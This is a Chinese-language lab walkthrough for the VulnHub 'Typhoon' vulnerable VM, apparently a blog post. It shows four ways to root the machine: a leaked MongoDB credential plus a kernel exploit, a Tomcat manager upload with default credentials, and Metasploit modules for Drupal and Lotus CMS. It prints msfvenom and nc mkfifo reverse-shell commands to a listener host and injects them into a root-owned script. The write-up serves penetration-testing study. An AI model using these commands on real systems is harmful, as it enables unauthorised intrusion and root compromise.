本次的Typhoon靶机包含了几个漏洞和配置错误。你们可以用这个靶机来测试网络服务漏洞,配置错误,web应用漏洞,也可以进行密码破解攻击,提权,后渗透,还可以进行信息收集和DNS攻击。

靶机下载地址:https://www.vulnhub.com/entry/typhoon-102,267/

渗透测试方法
· 网络扫描(Netdiscover和Nmap都行)

· 方法一:利用MongoDB进行入侵

· 查看robots.txt

· 通过浏览器利用MongoDB

· 获取凭证

· SSH登录

· 查看内核版本

· 内核提权

· 拿到root shell

· 方法二:通过Tomcat管理界面进行入侵(借助metasploit神器)

· 生成bash payload

· 上传bash payload

· 拿下root shell

· 方法三:利用Drupal CMS进行入侵

· 方法四:利用Lotus CMS进行入侵

这个靶机漏洞较多,所以我们也有很多方法来渗透它。不过本文只演示两种方法,其他方法大家可以自己琢磨。

方法1:通过MongoDB入侵
实战开始

第一步,使用netdiscover进行网络发现,找到我们的靶机IP。

netdiscover

我们这里的IP是192.168.1.101(每个人的IP可能不一样)。

下一步是对IP进行扫描,当然是少不了Nmap神器。

nmap -A 192.168.1.101
扫完后可以看到开放的端口和对应的服务如下:

· 21(ftp),

· 22(ssh),

· 25(smtp),

· 53(domain),

· 80(http),

· 110(pop3)

· 111(rpcbind)

· 139(netbios-ssn)

· 143(imap)

· 445(netbios-ssn)

· 631(ipp)

· 993(ssl/imaps),

· 995(ssl/pop3)

· 2049(nfs_acl)

· 3306(mysql),

· 5432(postgrespl)

· 8080(http)

如图:

在图中,可以看到robots.txt文件中/monoadmin这个目录禁止访问,这个目录可能会有用。我们还注意到8080端口也开放了,对应的服务是Apache Tomcat,使用的引擎是Coyote JSP engine1.1。这可能是另外一种渗透靶机的方法,我们一会儿再来看看。

我们先还是从80端口入手,通过浏览器访问一下/monoadmin这个目录,访问结果如图所示:

这里我们设置 change database为credentials(84mb),它会显示2个凭证的链接,我们点击一下这个链接,竟然显示出了用户名和密码,用户名是typhoon,密码是789456123,如图:

这个凭证对进一步渗透可能会大有帮助。

过了一会儿之后,突然脑海中蹦出来一个大胆的猜测,既然开放了22端口,那为什么不用刚才发现的凭证登录一下ssh试试呢,不得不说真是瞎猫碰上了死耗子,竟然成功登陆上来了,如图:

登录之后,我们发现虚拟机操作系统是Ubuntu14.04。而我们对Ubuntu14.04的提权exp也比较熟悉,这真是太棒了。

接着,我们用使用searchsploit来搜索Ubuntu14.04的提权exp,我们使用的exp已经在下图中用红框框出来了,然后我们将exp 37292.c复制到/root/directory目录下,然后使用Python启动一个服务器,从靶机中来下载这个exp。

exp搜索如图:

在靶机中把exp下载下来之后,将它放到/tmp目录下,然后编译exp并赋予权限,然后执行。

哦耶,成功提权到root。并且找到flag就在根目录下,查看一下文件内容即可得到flag,如图:

方法2:通过Tomcat Manager入侵

思路是这样的,利用Tomcat Manager Upload可以获得一个meterpreter会话,然后建立反向连接获得root权限。

OK,开始渗透实战。

前面通过扫描已经知道了8080端口是开放的,而且运行的是Apache Tomcat服务,直接在浏览器中访问8080端口看看,如图:

通过以前其他靶机的实战操作,我们已经对使用manager webapp来登录Tomcat服务器非常熟悉了。于是我们直接使用metasploit的一个模块tomcat_mgr_upload来尝试进行登录,使用Tomcat默认的用户名密码即可。

用户名:tomcat

密码:tomcat

噢耶,登录成功,获得meterpreter会话,如图:

进来之后发现是一个Python shell,以前我们也经常遇到,使用一条命令就可以进入系统的shell,命令如下:

python -c ‘import pty;pty.spawn(“/bin/bash”)’
上图中也已经框出来这条命令。

接着我们花了一些时间来查找和遍历文件,发现在/tab目录下有一个script.sh文件,所有者是root,并且拥有所有权限。

既然如此,那我们就想着往这个文件里插入一些恶意代码。

OK,那我们就使用msfvenom来生成一段bash code,命令如下:

msfvenom –p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=1234 R
生成的恶意代码如图:

然后我们将此恶意代码插入到script.sh文件中,使用如下命令:

echo “mkfifo /tmp/vvwjo; nc 192.168.1.109 1234 0</tmp/vvwjo | /bin/sh >/tmp/vvwjo 2>&1; rm /tmp/vvwjo” > script.sh
如图:

由于恶意代码在script.sh文件中得以执行后,我们在监听的nc端口上获得了一个反向的shell,而这个shell的权限直接是root,接下来查看root-flag就不多说了。

方法三:通过Drupal CMS入侵
访问80端口时并没有发现什么,于是我们使用Dirb来对web目录进行遍历,看看有没有新发现,如图:

如图可知,有两个cms目录,已经标记出来,有一个是drupal,这就有点搞头了。访问一下drupal目录,如图:

在metasploit中有一个可以直接利用drupal cms的模块,那就不多啰嗦了,直接上metasploit,命令如下:

use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(/unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.101
msf exploit(/unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal
msf exploit(/unix/webapp/drupal_drupalgeddon2) > exploit

nice,依然可以顺利拿下meterpreter会话,是不是很爽。接下来的后渗透就跟方法一中方法一样,大家可以自己尝试。

方法四:通过Lotus CMS入侵
刚才通过目录扫描,发现了两个cms目录,我们已经对drupal cms进行入侵了,现在我们再来搞一下第二个cms,首先还是通过浏览器访问一下,如图:

其实方法跟上面的一样,metasploit中也有一个可以直接利用lotus cms的模块,利用命令如下:

use exploit/multi/http/lcms_php_exec
msf exploit(multi/http/lcms_php_exec) > set rhost 192.168.1.101
msf exploit(multi/http/lcms_php_exec) > set uri /cms/
msf exploit(multi/http/lcms_php_exec) > exploit
执行命令后,结果如图:

非常棒,我们同样获得了靶机的另一个meterpreter会话,后渗透的步骤跟上面的一样,就不啰嗦了,大家自己跟着方法一的步骤做一遍即可。

靶机渗透之Typhoon实战相关推荐

  1. 渗透武器库--burpSuite实战(最强web安全工具,没有之一)

    点击"仙网攻城狮"关注我们哦~ 不当想研发的渗透人不是好运维 让我们每天进步一点点 简介 Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具.Burp Su ...

  2. dc-2 靶机渗透学习

    网络扫描 第一步先查看当前网段,进行主机探活 nmap -A -p- -v 192.168.202.0/24 发现80.7744端口开放 访问192.168.202.131来看看网站的80端口是啥,可 ...

  3. dc-3 靶机渗透学习

    靶机修复 dc-3靶机可能会存在扫不到靶机ip的问题,可以参考下面这篇博客解决,编辑网卡配置文件时命令有点错误. vim /etc/network/interfacers 改成 vim /etc/ne ...

  4. 渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集

    Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的 ): 英文文档:https://nmap.org/book/man.html 中文文档:https://nmap.org/ ...

  5. HA: SHERLOCK 靶机渗透取证

    HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...

  6. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  7. [HTB]“Heist”靶机渗透详细思路

    今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...

  8. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  9. 【渗透测试】靶机渗透Vulnhub-bulldog

    目录 前言 一.bulldog靶机安装 二.bulldog靶机渗透 1.信息搜集 2.Web渗透--后台登录 3.Web渗透--命令注入&nc反弹shell 4.权限提升 渗透步骤回顾 感悟 ...

  10. 靶机渗透【bulldog】

    文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...

最新文章

  1. 使用C#格式化字符串 1
  2. 使用Lucene开发自己的搜索引擎
  3. 个人成长:2021年9月记
  4. **【ci框架】精通CodeIgniter框架
  5. Javascript中的翻转器
  6. SQL Server :理解数据记录结构
  7. 7-48 字符串输入练习 (I) (15 分)
  8. mysql 设置密码
  9. ios 线条球_画线弹球球游戏下载|画线弹球球ios版下载v1.0.2-乐游网IOS频道
  10. 实用android 代码,Android 实用代码七段(一)
  11. Outlook2007 打不开EXCEL?
  12. arctanx麦克劳林公式推导过程_实用反三角函数运算公式
  13. 多尺度R-CNN(2): Inside-Outside Net: Detecting Objects in Context with Skip Pooling and Recurrent Neural
  14. 什么是EOS智能合约
  15. 《C游记》 第二章 - 初识分支句 循环助本心(贰)
  16. 动漫鬼刀MAC高清动态桌面壁纸
  17. java开发微信如何维护登录状态_微信小程序中做用户登录与登录态维护的实现详解...
  18. Python学习笔记9-爬花瓣网指定图片,从此找图不用愁
  19. html石头剪刀布源码,JavaScript实现的石头剪刀布游戏源码分享
  20. 盘点2020 | Cocos 技术与实例教程集锦

热门文章

  1. 读书笔记2014第11本:历史上最伟大的10个方程
  2. Android 获取手机Ram 和 Rom大小
  3. 光纤中多模和单模的区别
  4. 《秘密》之你的秘密和生命的秘密
  5. 微信小程序 开发者工具和真机调试都能正常请求访问,线上不能登录请求问题
  6. 美国服务器托管机房如何选择?
  7. 【Uplift】模拟数据篇
  8. 刘备的仁义 ——品《三国演义》
  9. linux系统相关文件夹讲解,Linux中重要文件夹介绍PPT课件
  10. xp系统计算机蓝屏,12种XP系统蓝屏错误代码的含义和解决办法